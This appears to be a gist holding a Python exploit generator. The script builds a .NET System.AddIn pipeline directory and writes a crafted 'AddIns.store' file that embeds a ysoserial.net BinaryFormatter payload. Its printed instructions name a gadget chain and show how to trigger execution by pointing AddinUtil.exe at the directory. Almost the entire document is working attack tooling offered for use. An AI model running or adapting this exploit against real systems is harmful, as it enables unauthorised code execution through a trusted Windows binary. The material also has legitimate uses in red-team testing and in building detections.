@two06
Created April 23, 2025 13:48
import os
import sys
import struct
import argparse
def create_addin_exploit(payload_file, output_dir):
    """Lay out a System.AddIn pipeline directory and write an ``AddIns.store`` file.

    Creates ``output_dir`` with the five pipeline subdirectories listed in
    ``pipeline_dirs`` (each holding a placeholder ``README.txt``), reads
    ``payload_file`` as raw bytes, and writes ``<output_dir>/AddIns/AddIns.store``
    with this layout:

        int32 little-endian   format version, always 1
        int64 little-endian   payload length in bytes
        bytes                 payload, copied verbatim

    The payload bytes are never parsed or validated here; the argparse help in
    ``main`` says they are expected to be a ysoserial.net (BinaryFormatter)
    stream.

    Args:
        payload_file: path of the file whose bytes become the store body.
        output_dir: root directory to populate; created if it does not exist.

    Returns:
        The path of the written ``AddIns.store`` file.

    Raises:
        OSError: propagated unchanged from ``makedirs``/``open``/``write``.
    """
    # Create the main pipeline directory
    print(f"[+] Creating pipeline directory structure in {output_dir}")
    os.makedirs(output_dir, exist_ok=True)
    # Create required pipeline subdirectories
    pipeline_dirs = [
        "HostSideAdapters",
        "Contracts",
        "AddInSideAdapters",
        "AddInViews",
        "AddIns"  # the directory that will hold AddIns.store
    ]
    for dir_name in pipeline_dirs:
        dir_path = os.path.join(output_dir, dir_name)
        os.makedirs(dir_path, exist_ok=True)
        # Create a placeholder README so each directory is non-empty
        # (text mode; the README content is informational only).
        with open(os.path.join(dir_path, "README.txt"), 'w') as f:
            f.write(f"Dummy file for {dir_name} directory")
    # Read the payload from file as raw bytes; nothing about its content is checked
    print(f"[+] Reading payload from {payload_file}")
    with open(payload_file, 'rb') as f:
        payload_data = f.read()
    # Create the AddIns.store file inside the AddIns directory
    print("[+] Creating malicious AddIns.store file")
    addins_dir = os.path.join(output_dir, "AddIns")
    addins_store_path = os.path.join(addins_dir, "AddIns.store")
    with open(addins_store_path, 'wb') as f:
        # Fixed 12-byte header: version (int32 LE, always 1) followed by the
        # payload length (int64 LE). Because the header never varies, the
        # on-disk layout is straightforward to recognise.
        f.write(struct.pack("<i", 1))
        # Write the payload size (int64)
        f.write(struct.pack("<q", len(payload_data)))
        # Write the payload data verbatim (an empty payload yields a 12-byte file)
        f.write(payload_data)
    print(f"[+] Exploit created successfully in {output_dir}")
    # NOTE(review): f-string with no placeholders; a plain string would do.
    print(f"[+] To trigger the exploit, run:")
    print(f" AddinUtil.exe -addinroot:{addins_dir}")
    return addins_store_path
def main():
    """Parse the command line, build the pipeline directory, and print usage steps.

    Positional ``payload_file`` is the raw payload to embed; ``--output-dir``/``-o``
    selects the root directory (default ``./exploit``).

    Returns:
        Process exit status: 0 on success; 1 when the payload file does not
        exist or when ``create_addin_exploit`` raises.
    """
    parser = argparse.ArgumentParser(description='Generate AddinUtil BinaryFormatter deserialization exploit')
    parser.add_argument('payload_file', help='Path to the ysoserial.net generated payload file')
    parser.add_argument('--output-dir', '-o', default='./exploit', help='Output directory for the exploit (default: ./exploit)')
    args = parser.parse_args()
    # Only existence is checked here; an unreadable or directory path surfaces
    # as an exception in the try block below.
    if not os.path.exists(args.payload_file):
        print(f"Error: Payload file '{args.payload_file}' not found", file=sys.stderr)
        return 1
    try:
        addins_file = create_addin_exploit(args.payload_file, args.output_dir)
        print("\n[+] File created:")
        print(f" AddIns.store: {addins_file}")
        print("\n[+] Instructions:")
        print("1. Generate a ysoserial.net payload with an appropriate gadget chain")
        print(" Example: ysoserial.net -f BinaryFormatter -g TypeConfuseDelegate -c calc -o raw > payload.bin")
        # NOTE(review): the next two f-strings have no placeholders that need
        # them (the first has none at all); plain strings would be clearer.
        print(f"2. Run this script: python addinutil_exploit.py payload.bin")
        print(f"3. Execute AddinUtil.exe with: AddinUtil.exe -addinroot:{os.path.join(args.output_dir, 'AddIns')}")
        print("\n[+] Done! When AddinUtil.exe loads the store file, the payload should execute")
    except Exception as e:
        # Top-level boundary: any failure is reported on stderr as a one-line
        # message (no traceback) and mapped to exit status 1.
        print(f"Error: {str(e)}", file=sys.stderr)
        return 1
    return 0
if __name__ == "__main__":
    # Script entry point: the process exit status is whatever main() returns
    # (sys.exit(x) is exactly `raise SystemExit(x)`).
    raise SystemExit(main())